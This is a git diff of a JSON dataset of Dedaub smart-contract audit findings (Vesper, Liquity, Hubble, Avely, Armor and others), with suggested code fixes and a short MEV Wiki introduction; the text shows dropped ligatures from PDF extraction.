possible, the whole balance of the contract can be drained by reentering multiple times. It is easier to perform this aack if the aackers withdrawal is the rst to be executed, which is actually not hard to achieve. This vulnerability is highly unlikely, as it requires the execution reaching an untrusted contract, still we suggest adding a reentrancy guard (minor overhead) to completely remove the possibility of such a scenario. 01 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "rewards might get stuck in CompoundLeverageStrategy Status Dismissed (Normal path: rebalance before migrate) CompoundLeverageStrategy does not offer a way to migrate COMP tokens that might have been left unclaimed by the strategy up to the point of migration. What is more, COMP is declared a reserved token by CompoundMakerStrategy making it impossible to sweep the strategys COMP balance even if a claim is made to Compound after the migration. The _beforeMigration hook should be extended to account for the claim and consequent transfer of COMP tokens to the new strategy as follows: function _beforeMigration(address _newStrategy) internal virtual override { require(IStrategy(_newStrategy).token() == address(cToken), \"wrong-receipt-token\"); minBorrowLimit = 0; // It will calculate amount to repay based on borrow limit and payback all _reinvest(); // Dedaub: Claim COMP and transfer to new strategy. _claimComp(); IERC20(COMP).safeTransfer(_newStrategy,IERC20(COMP).balanceOf(address(this))); }", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Low" + "Vesper Pools+Strategies September", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "usage increases quadratically to positions ACKNOWLEDGED Whenever a users position is modied, maintained or liquidated, all of the users token positions need to be queried (both maker and taker). For instance, this happens in ClearingHouse::getTotalNotionalPositionAndUnrealizedPnl for (uint i; i < numAmms; ++i) { if (amms[i].isOverSpreadLimit()) { (_notionalPosition, _unrealizedPnl) = amms[i].getOracleBasedPnl(trader, margin, mode); } else { (_notionalPosition, _unrealizedPnl,,) = amms[i].getNotionalPositionAndUnrealizedPnl(trader); } notionalPosition += _notionalPosition; unrealizedPnl += _unrealizedPnl; } Therefore, if we assume that a user with more positions and exposure to more tokens needs to tweak their positions from time to time, and the number of actions correlates the number of positions, the gas usage really scales quadratically to the number of positions for such a user.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "rewards might get stuck in CompoundXYStrategy Dismissed (as above) 6 The _beforeMigration hook of CompoundXYStrategy calls _repay and lets it handle the claim of COMP and its conversion to collateral, thus no COMP needs to be transferred to the new strategy prior to migration. However, the claim in _repay happens only when the condition _repayAmount > _borrowBalanceHere evaluates to true, which might not always hold prior to migration, leading to COMP getting stuck in the strategy. This is because COMP is declared a reserved token and thus cannot be swept after migration.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "regarding the numerical methods of CurveMath.vy ACKNOWLEDGED [Below we use the notation of the curve crypto whitepaper] The CurveCrypto invariant in the case of pools with only two assets (N=2) can be simplied into a low degree polynomial, which could lead to a faster convergence of the numerical methods. 01 The coeicient K, when N=2 (we denote by x and y the deposits of the two assets in the pool), is given by the formula If we multiply both sides of the equation an equivalent equation, which is polynomial in all three variables x, y and D: by the denominator of K we get As you can see it is a cubic equation for x and y and you can use the formulas for cubic equations either to compute faster the solution or to get a beer initial value for the iterative method you are currently using. We believe it would be worth spending some time experimenting with the numerical methods to get the fastest possible convergence (and consequently reduced gas fees paid by the users).", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "Compound markets are never entered Dismissed (unnecessary) The CompoundLeverageStrategys CToken market Comptroller. This leaves the strategy unable to borrow from the specied CToken. is never entered via Compounds", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "functionality to remove AMMs ACKNOWLEDGED Governance has the ability to whitelist AMMs via ClearingHouse::whitelistAmm method, while there is no functionality to remove or blacklist an AMM.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "The checkpoint method only considers proting strategies when computing the total prots of a pools strategies Resolved The checkpoint() method of the VFRStablePool iterates over the pools strategies to compute their total prots and update the pools predictedAPY state variable: address[] memory strategies = getStrategies(); uint256 profits; // SL: Is it ok that it doesn't consider strategies at a loss? for (uint256 i = 0; i < strategies.length; i++) { (, uint256 fee, , , uint256 totalDebt, , , ) = IPoolAccountant(poolAccountant).strategy(strategies[i]); uint256 totalValue = IStrategy(strategies[i]).totalValueCurrent(); if (totalValue > totalDebt) { uint256 totalProfits = totalValue - totalDebt; uint256 actualProfits = totalProfits - ((totalProfits * fee) / MAX_BPS); profits += actualProfits; } } The above computation disregards the losses of any strategies that are not proting. Due to that the predicted APY value will not be accurate. 7", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "collateral index checks are missing ACKNOWLEDGED There are several external methods of MarginAccount, namely addMargin, addMarginFor, removeMargin, liquidateExactRepay and liquidateExactSeize that do not implement a check on the collateral index supplied, which can lead to the ungraceful termination of the transaction if an incorrect index has been supplied. A simple check such as: require(idx < supportedCollateral.length, \"Collateral not supported\"); could be used to also inform the user of the problem with their transaction. 01", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "CompoundXY strategy does not account for rapid rise of Resolved borrow token price (This issue was also used earlier as an example in our architectural recommendations.) The CompoundXY strategy seeks to repay a borrowed amount if its value rises more than expected. However, volatile assets can rise or drop in price dramatically. (E.g., a collateral stablecoin can lose its peg, or a tokens price can double in hours.) This means that the Compound loan may become undercollateralized. In this case, the borrowed amount may be worth more than the collateral, so it would be benecial for the strategy to not repay the loan. Furthermore, it might be the case that the collateral gets liquidated before the strategy rebalances. In this case the strategy will be left with borrow tokens that it can neither transfer nor swap. The strategy can be enhanced to account for the rst of these cases, and the overall architecture can adopt an emergency rescue mechanism for possibly stuck funds. This emergency rescue would be a centralization element, so it should only be authorized by governance. M6 CompoundXYStrategy, CompoundLeverageStrategy: Error code of Mostly Resolved Compound API calls ignored, can lead to silent failure of functionality The calls to many state-altering Compound API calls return an error code, with a 0-value indicating success. These error codes are often ignored, which can cause certain parts of the strategies functionality to fail, silently. The calls with their error status ignored are: CompoundXYStrategy::constructor: Comptroller.enterMarkets() CompoundXYStrategy::updateBorrowCToken: Comptroller.exitMarket(), Comptroller.enterMarkets(), CToken.borrow() CompoundXYStrategy::_mint: CToken.mint() (is returned but not check by the callers of _mint()) CompoundXYStrategy::_reinvest: CToken.borrow() CompoundXYStrategy::_repay: CToken.repayBorrow() CompoundXYStrategy::_withdrawHere: CToken.redeemUnderlying() CompoundLeverageStrategy::_mint: CToken.mint() CompoundLeverageStrategy::_redeemUnderlying: CToken.redeemUnderlying() CToken.redeem(), CompoundLeverageStrategy::_borrowCollateral: CToken.borrow() CompoundLeverageStrategy::_repayBorrow: CToken.repayBorrow() 8 Low Severity Nr. Description", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "event is missing timestamp eld ACKNOWLEDGED The AMM::PositionChanged event is potentially missing a timestamp eld that all related events (LiquidityAdded, LiquidityRemoved, Unbonded) other incorporate. trader", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "ALPHA rewards are not claimed on-chain Status Open The _claimRewardsAndConvertTo() method of the Alpha lend strategy does not do what its name and comments indicate it does. It only converts the claimed ALPHA tokens. The actual claiming of the funds does not appear to happen using an on-chain API.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "out code ACKNOWLEDGED In method MarginAccount::isLiquidatable the following line is commented out: _isLiquidatable = IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE; This is because IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE is equal to 0, which will be the default value of _isLiquidatable if no value is assigned to it, thus the above assignment is not necessary. Nevertheless, explicitly assigning the enum value makes the code much more readable and intiutive.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "storage eld Resolved In CompoundLeverageStrategy, eld borrowToken is unused. A comment mentions it but does not match the code. L3 Two swaps could be made one, for fee savings Dismissed, detailed consideration In CompoundXYStrategy::_repay, COMP is rst swapped into collateral, and then collateral (which should be primarily, if not exclusively, the swapped COMP) is swapped to the borrow token. This incurs double swap fees. Other/Advisory Issues This section details issues that are not thought to directly affect the functionality of the project, but we recommend addressing. Nr. Description", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "constants ACKNOWLEDGED There are several magic constants throughout the codebase, many of them related to the precision of token amounts, making it diicult to reason about the correctness of certain computations. The developers of the protocol are aware of the issue and claim that they have developed extensive tests to make sure nothing is wrong in this regard.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "contract seems to serve no purpose Status Open This contract currently does nearly nothing. It is neither inherited nor exports functionality that makes it usable as part of a VFR strategy. 9", "labels": [ "Dedaub", - "Hubble Exchange", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "price decimals assumption ACKNOWLEDGED The Oracle contract code makes the assumption that the price value returned by the ChainLink oracle has 8 decimals. This assumption appears to be correct if the oracles used report the price in terms of USD. Nevertheless, using the oracles available decimals method and avoiding such a generic assumption would make the code much more robust.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "contract is there only for code reuse Open The VFR contract currently has the form: abstract contract VFR { function _transferProfit(...) internal virtual returns (uint256) {...} function _handleStableProfit(...) internal returns (uint256 _profit) {...} function _handleCoverageProfit(...) internal returns (uint256 _profit) {...} } It is, thus, a contract that merely denes internal functions, used via inheritance, for code reuse purposes. Inheritance for code reuse is often considered a bad, low-level coding practice. A similar effect may be more cleanly achieved via use of a library.", "labels": [ "Dedaub", - "Hubble Exchange", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "can be reused ACKNOWLEDGED 01 The following code shared by methods MarginAccount::liquidateExactRepay and MarginAccount::liquidateExactSeize can be factored out in a separate method and reused: clearingHouse.updatePositions(trader); // credits/debits funding LiquidationBuffer memory buffer = _getLiquidationInfo(trader, idx); if (buffer.status != IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE) { revert NOT_LIQUIDATABLE(buffer.status); } In addition, all the code of AMM::isOverSpreadLimit: function isOverSpreadLimit() external view returns(bool) { if (ammState != AMMState.Active) return false; uint oraclePrice = uint(oracle.getUnderlyingPrice(underlyingAsset)); uint markPrice = lastPrice(); uint oracleSpreadRatioAbs; if (markPrice > oraclePrice) { oracleSpreadRatioAbs = markPrice - oraclePrice; } else { oracleSpreadRatioAbs = oraclePrice - markPrice; } oracleSpreadRatioAbs = oracleSpreadRatioAbs * 100 / oraclePrice; if (oracleSpreadRatioAbs >= maxOracleSpreadRatio) { return true; } return false; } except line uint markPrice = lastPrice(); can be factored out in another method, e.g., _isOverSpreadLimit(uint markPrice), which will have markPrice as an argument. Then method _isOverSpreadLimit can be reused in methods _short and _long. 01", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "reserved tokens Open In most strategies the collateral token is part of those in isReservedToken. Not in AlphaLendStrategy.", "labels": [ "Dedaub", - "Hubble Exchange", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "modiers ACKNOWLEDGED Methods syncDeps of MarginAccount and InsuranceFund could be declared external instead of public.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "COMP rewards can be triggered by anyone Dismissed, after review COMP Although we cannot see an issue with it, multiple public functions allow anyone to trigger a claim methods of totalValueCurrent/isLossMaking, and similarly in CompoundXYStrategy. It is worth revisiting whether the timing of rewards can confer a benet to a user. CompoundLeverageStrategy rewards, e.g., in", "labels": [ "Dedaub", - "Hubble Exchange", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "code/contracts ACKNOWLEDGED tests/Executor.sol is not used. A12 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.8.9 which, at the time of writing, have some known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaected. 01 CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts yields considerable power over the protocol, including changing the contracts holding the users funds, adding AMMs and tokens, which potentially means borrowing tokens using fake collateral, etc. In addition, the owner of the protocol can: - Blacklist any user. - Set important parameters in the vAMM which change the price of any assets: price_scale, price_oracle, last_prices. This allows the owner to potentially liquidate otherwise healthy positions or enter into bad debt positions. The computation of the Margin Fraction takes into account the weighted collateral, whose weights are going to be decided by governance. Currently the protocol uses NFTs for governance but in the future the decisions will be made through a DAO. Currently, there is no relevant implementation, i.e., the Hubble protocol does not yet oer a governance token. Still, even if the nal solution is decentralized, governance should be really careful and methodical when deciding the values of the weights. We believe that another, safer approach would be to alter these weights in a specic way dened by predetermined formulas and allow only small adjustments by the DAO. 01", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "conventions Resolved often functionality Similar instance, between different CompoundXYStrategyETH and CompoundLeverageStrategyETH, we notice a difference in the _mint function (in one case it returns a value in the other not), and the presence of an _afterRedeem vs. full overriding of _redeemUnderlying. conventions. For follows", "labels": [ "Dedaub", - "Hubble Exchange", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { - "title": "suggestions ", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Delta Audit - Sep 22.pdf", - "body": " INFO In the RelayEncoder.sol contract the function encode_withdraw_unbonded() uses several arithmetic operations with numbers that can be expressed as powers of 2. Thus, the multiplications and the divisions can be replaced with bitwise operations for more eiciency and maintainability. Furthermore, in Encoding.sol::scaleCompactUint:45 the 0xFF can be removed since the uint8() casting will give the same result even without the AND operation.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "looser checks are performed on construction than on Resolved migrateFusePool() When the RariFuseStrategy is constructed, a CToken (assumed to belong to an instantiation of a Rari Fuse pool) is passed as an argument. However, when the strategy migrates to another Fuse pool, Fuses API is used to ensure the new CToken will be part of a Rari Fuse pool. The same checks should also take place during the contracts construction. 10 A7 Compiler bugs Info The contracts were compiled with the Solidity compiler v0.8.3 which, at the time of writing, has a known minor issue. We have reviewed the issue and do not believe it to affect the contracts. More specically the known compiler bug associated with Solidity compiler v0.8.3: Memory layout corruption can happen when using abi.decode for the deserialization of two-dimensional arrays. 11", "labels": [ "Dedaub", - "Lido on Kusama,Polkadot Delta", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Delta Audit - Sep 22.pdf", - "body": "for minor changes ACKNOWLEDGED The auditors appreciated the inclusion of tests for all major changes. It would be benecial to include tests also for smaller changes that seem to be missing (for instance we could not nd a test for the case totalXcKSMPoolShares == 0 and totalVirtualXcKSMAmount != 0). Although this check is minor, the fact that it was missing in the previous version makes it worthy of a test. A3 Compiler known issues INFO The code is compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, i.e., a specic version, to be condent about the baseline guarantees 4 oered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe aect the correctness of the contracts", + "title": "gas behavior in BondExtraData ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Delta Audit (NFT additions).pdf", + "body": " RESOLVED (commit a60f451f) The BondExtraData struct is designed to t in one storage word: struct BondExtraData { uint80 initialHalfDna; uint80 finalHalfDna; uint32 troveSize; // Debt in LUSD uint32 lqtyAmount; // Holding LQTY, staking or deposited into Pickle uint32 curveGaugeSlopes; // For 3CRV and Frax pools combined } (We note, in passing, that the uint32 amounts are rounded down, so dierent underlying amounts can map to the same recorded amount. This seems like an extremely minor inaccuracy but it also pertains to issue L1, of NFT manipulation.) The result of ing the struct in a single word is that the following code is highly suboptimal, gas-wise, requiring 4 separate SSTOREs, but also SLOADs of values before the SSTORE (so that unaected bits get preserved): function setFinalExtraData(address _bonder, uint256 _tokenID, uint256 _permanentSeed) external returns (uint80) { 0 idToBondExtraData[_tokenID].finalHalfDna = newDna; idToBondExtraData[_tokenID].troveSize = _uint256ToUint32(troveManager.getTroveDebt(_bonder)); idToBondExtraData[_tokenID].lqtyAmount = _uint256ToUint32(lqtyToken.balanceOf(_bonder) + lqtyStaking.stakes(_bonder) + pickleLQTYAmount); idToBondExtraData[_tokenID].curveGaugeSlopes = _uint256ToUint32((curveLUSD3CRVGaugeSlope + curveLUSDFRAXGaugeSlope) * CURVE_GAUGE_SLOPES_PRECISION); We recommend using a memory record of the struct, reading its original value from storage, updating the 4 elds in-memory, and storing back to idToBondExtraData[_tokenID]. The Solidity compiler could conceptually optimize the above paern, but current versions do not even aempt such an optimization in the presence of internal calls, let alone external calls. (We also ascertained that the resulting bytecode is suboptimal under the current build seings of the repo.)", "labels": [ "Dedaub", - "Lido on Kusama,Polkadot Delta", + "Chicken Bonds Delta", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - May '23.pdf", - "body": "Stake event does not capture the msg.sender WONT FIX The SolidStaking Stake event captures the recipient account but not the msg.sender, thus this piece of information is not recorded if the recipient is not also the msg.sender. A2 LiquidityDeployer::getTokenDepositors can be optimized to save gas WONT FIX The function LiquidityDeployer::getTokenDepositors copies the depositors array from storage to memory by performing a loop over each element of the array instead of just returning the array. LiquidityDeployer::getTokenDepositors function getTokenDepositors() external view returns (address[] memory tokenDepositors) { } tokenDepositors = new address[](depositors.tokenDepositors.length); for (uint i; i < depositors.tokenDepositors.length; i++) { tokenDepositors[i] = depositors.tokenDepositors[i]; } By changing the code to: function getTokenDepositors() external view returns (address[] memory tokenDepositors) { } return depositors.tokenDepositors; the cost of calling getTokenDepositors is reduced by 33% and the deployment cost of the LiquidityDeployer is reduced by ~1.5%.", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Delta Audit (NFT additions).pdf", + "body": "extraneous check RESOLVED (commit f5fb7f16) Under the, relatively reasonable, assumption that MIN_BOND_AMOUNT is never zero, the rst of the following checks would be extraneous: function createBond(uint256 _lusdAmount) public returns (uint256) { _requireNonZeroAmount(_lusdAmount); _requireMinBond(_lusdAmount); A3 Compiler bugs INFO (RESOLVED) 0 The code is compiled with Solidity 0.8.10 or higher. For deployment, we recommend no floating pragmas, i.e., a specic version, so as to be condent about the baseline guarantees oered by the compiler. Version 0.8.10, in particular, has some known bugs, which we do not believe to aect the correctness of the contracts.", "labels": [ "Dedaub", - "Solid World", + "Chicken Bonds Delta", "Severity: Informational" ] }, @@ -1868,85 +2828,5 @@ "Chainlink VRF v.2", "Severity: Informational" ] - }, - { - "title": "can be simplied from Uint32 to Bool ", - "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", - "body": " RESOLVED In aZil, the eld tmp_buffer_exists_at_ssn is declared as Uint32: field tmp_buffer_exists_at_ssn: Uint32 = uint32_zero However, all writes to this eld are either 0 or 1, and all reads from it are followed up by an equality check with 0 and a match statement - the eld is a boolean la C. It is recommended that the eld be declared Bool, in order to improve code readability and simplify the snippets that read from it.", - "labels": [ - "Dedaub", - "Avely", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", - "body": "assignment sequence can be simplied RESOLVED In the aZil.CalculateTotalWithdrawalBlock procedure, can be simplied: procedure CalculateTotalWithdrawalBlock(deleg_withdrawal: Pair ByStr20 Withdrawal) match deleg_withdrawal with | Pair delegator withdrawal => match withdrawal with | Withdrawal withdraw_token_amt withdraw_stake_amt => match withdrawal_unbonded_o with | Some (Withdrawal token stake) => updated_token = builtin add token withdraw_token_amt; updated_stake = builtin add stake withdraw_stake_amt; unbonded_withdrawal = Withdrawal updated_token updated_stake; withdrawal_unbonded[delegator] := unbonded_withdrawal | None => (* Dedaub: This branch can be simplified to withdrawal_unbonded[delegator] := withdrawal *) unbonded_withdrawal = Withdrawal withdraw_token_amt withdraw_stake_amt; withdrawal_unbonded[delegator] := unbonded_withdrawal end end end end The inner matchs None case can become: | None => withdrawal_unbonded[delegator] := withdrawal end", - "labels": [ - "Dedaub", - "Avely", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", - "body": "of multisig_wallet.RevokeSignature can be simplied DISMISSED In multisig_wallet, RevokeSignature can be simplied. The transition checks whether there are zero signatures through c_is_zero = builtin eq c zero; But for this line of code to execute exists signatures[transactionId][_sender]; must have already been true. Therefore it is guaranteed that there is at least one signature, and c_is_zero cannot be 0. Thus the following transition can be simplied: (* Revoke signature of existing transaction, if it has not yet been executed. *) transition RevokeSignature (transactionId : Uint32) sig <- exists signatures[transactionId][_sender]; match sig with | False => err = NotAlreadySigned; MakeError err | True => count <- signature_counts[transactionId]; match count with | None => err = IncorrectSignatureCount; MakeError err | Some c => c_is_zero = builtin eq c zero; match c_is_zero with | True => err = IncorrectSignatureCount; MakeError err | False => new_c = builtin sub c one; signature_counts[transactionId] := new_c; delete signatures[transactionId][_sender]; e = mk_signature_revoked_event transactionId; event e end end end end By replacing the Some c branch with the following: Some c => new_c = builtin sub c one; signature_counts[transactionId] := new_c; delete signatures[transactionId][_sender]; e = mk_signature_revoked_event transactionId; event e", - "labels": [ - "Dedaub", - "Avely", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", - "body": "of azil.DrainBuffer logic can be simplied RESOLVED Transition DrainBuffer of aZil also admits some simplication: a bind action can be factored out, since it occurs in both cases of a match, and another binding is redundant, both shown in comments below. transition DrainBuffer(buffer_addr: ByStr20) RequireAdmin; buffers_addrs <- buffers_addresses; is_buffer = is_buffer_addr buffers_addrs buffer_addr; match is_buffer with | True => FetchRemoteBufferExistsAtSSN buffer_addr; (* local_lastrewardcycle updated in FetchRemoteBufferExistsAtSSN *) lrc <- local_lastrewardcycle; RequireNotDrainedBuffer buffer_addr lrc; var_buffer_exists <- tmp_buffer_exists_at_ssn; is_exists = builtin eq var_buffer_exists uint32_one; match is_exists with | True => holder_addr <- holder_address; ClaimRewards buffer_addr; ClaimRewards holder_addr; RequestDelegatorSwap buffer_addr holder_addr; ConfirmDelegatorSwap buffer_addr holder_addr | False => holder_addr <- holder_address; (* Dedaub: This is also done in the True branch of the match *) ClaimRewards holder_addr end | False => e = BufferAddrUnknown; ThrowError e end; lrc <- local_lastrewardcycle; (* Dedaub: extraneous, it was already done above in the True case, and the False case is irrelevant *) buffer_drained_cycle[buffer_addr] := lrc; tmp_buffer_exists_at_ssn := uint32_zero end Buer/Holder have permissions for transitions they will never A5 execute DISMISSED As can be seen in the earlier transition graph, Buer is allowed to initiate aZil.CompleteWithdrawalSuccessCallBack but never will. Holder is allowed to initiate aZil.DelegateStakeSuccessCallBack but never will.", - "labels": [ - "Dedaub", - "Avely", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", - "body": "tokens conversion Status Resolved In the following code snippet taken from arShield::liqAmts amounts ethOwed and tokensOwed are supposed to represent equal value. ethOwed = covBases[_covId].getShieldOwed( address(this) ); if (ethOwed > 0) tokensOwed = oracle.getTokensOwed(ethOwed, address(pToken), uTokenLink); tokenFees = feesToLiq[_covId]; tokensOwed += tokenFees; require(tokensOwed > 0, \"No fees are owed.\"); uint256 ethFees = ethOwed > 0 ? ethOwed * tokenFees / tokensOwed : getEthValue(tokenFees); ethOwed += ethFees; However, code line tokensOwed += tokenFees; is misplaced resulting in an underpriced ethFees computation. We suggest that it be altered as follows: ethOwed = covBases[_covId].getShieldOwed( address(this) ); if (ethOwed > 0) tokensOwed = oracle.getTokensOwed(ethOwed, address(pToken), uTokenLink); tokenFees = feesToLiq[_covId]; require(tokensOwed + tokenFees > 0, \"No fees are owed.\"); 5 uint256 ethFees = ethOwed > 0 ? ethOwed * tokenFees / tokensOwed : getEthValue(tokenFees); ethOwed += ethFees; tokensOwed += tokenFees; for accuracy. H2 Duplicate subtraction of fees amount Resolved In arShield::payAmts the new ethValue is calculated as follows: // Ether value of all of the contract minus what we're liquidating. ethValue = (pToken.balanceOf( address(this) ) // Dedaub: _tokenFees amount is subtracted twice - _tokenFees - totalFeeAmts()) * _ethOwed / _tokensOwed totalFeeAmounts() also considers all liquidation fees, resulting in _tokenFees being subtracted twice. This can cause important harm to the protocol, as the total value of coverage purchased is underestimated. 6 Medium Severity ", - "labels": [ - "Dedaub", - "Armor arShield", - "Severity: High" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", - "body": "variable name We suggest that variable totalCost Status Resolved // Current cost per second for all Ether on contract. uint256 public totalCost; is renamed to totalCostPerSec for clarity.", - "labels": [ - "Dedaub", - "Armor arShield", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", - "body": "version of SafeMath library Resolved The code of the SafeMath library included is of an old version of compiler (< 0.8.0) being set to pragma solidity 0.8.4. However, compiler versions of 0.8.* revert on overow or underow, so this library has no effect. We suggest ArmorCore.sol not use this library and substitute SafeMath operations to normal ones, as well as SafeMath.sol contract be completely removed.", - "labels": [ - "Dedaub", - "Armor arShield", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", - "body": "comment Resolved In arShield.sol function confirmHack has a misleading @dev comment: /** * Dedaub: used by governor, not controller * @dev Used by controller to confirm that a hack happened, which then locks the contract in anticipation of claims. **/ function confirmHack( uint256 _payoutBlock, uint256 _payoutAmt ) external isLocked onlyGov 9 A4 Extra protection of refunds in arShield Resolved Function CoverageBase::DisburseClaim is called by governance and transfers ETH amount to a selected _arShield, that is supposed to be used for claim refunds. /** * @dev Governance may disburse funds from a claim to the chosen shields. * @param _shield Address of the shield to disburse funds to. * @param _amount Amount of funds to disburse to the shield. **/ function disburseClaim( address payable _shield, uint256 _amount ) { external onlyGov require(shieldStats[_shield].lastUpdate > 0, \"Shield is not authorized to use this contract.\"); _shield.transfer(_amount); } We suggest that an extra requirement be added, checking that _shield is locked. In the opposite case the ETH amount transferred to the arShield contract as refunds can be immediately transferred to the beneciary. arShields contract locking/unlocking and disburseClaim() are all government-only actions, however this suggestion ensures security in case of false ordering of the governance transactions. 10", - "labels": [ - "Dedaub", - "Armor arShield", - "Severity: Informational" - ] } ] \ No newline at end of file diff --git a/results/gitbook_docs.json b/results/gitbook_docs.json index f7c9be8..dd34376 100644 --- a/results/gitbook_docs.json +++ b/results/gitbook_docs.json @@ -442,7 +442,7 @@ { "title": "Introduction", "html_url": "https://www.mev.wiki/", - "body": "Introduction Welcome to the MEV Wiki. Introduction This is a public resource for learning about MEV (Maximal Extractable Value). We cover a range of topics including the key concepts, research on this the topic, different approaches to tackling this issue by various projects out there. Find any errors or wants to share your opinions? See how you can contribute here . What is MEV? Maximal (formerly \"miner\" in the context of Proof of Work) extractable value (MEV) refers to the maximum value that can be extracted from block production in excess of the standard block reward and gas fees by censoring and/or changing the order of transactions in a block. When someone sends a transaction in the blockchain, there is a delay between the time when the transaction is broadcasted to the network and when it is actually mined into a block. During this period, transactions sit in a pending transaction pool called the mempool where contents are visible to everyone. Arbitrageurs and miners can monitor the mempool and find opportunities to maximize their own profits e.g. by frontrunning transactions. If a front-runner is a miner, they can also reorder or even censor transactions. MEV income can also be shared with non miners & traders who participate in some profit sharing schemes within the category of FaaS/MEVA . Why does this matter ? MEV can harm users MEV is an invisible tax that miners can collect from users. MEV can destabilize Ethereum If block rewards are small enough compared to MEV, it can be rational for miners to destabilize consensus by reordering or censoring transactions. Just how bad is the problem? You can use the Flashbots Dashboard to track Extracted MEV to better assess this worsening trend realtime. 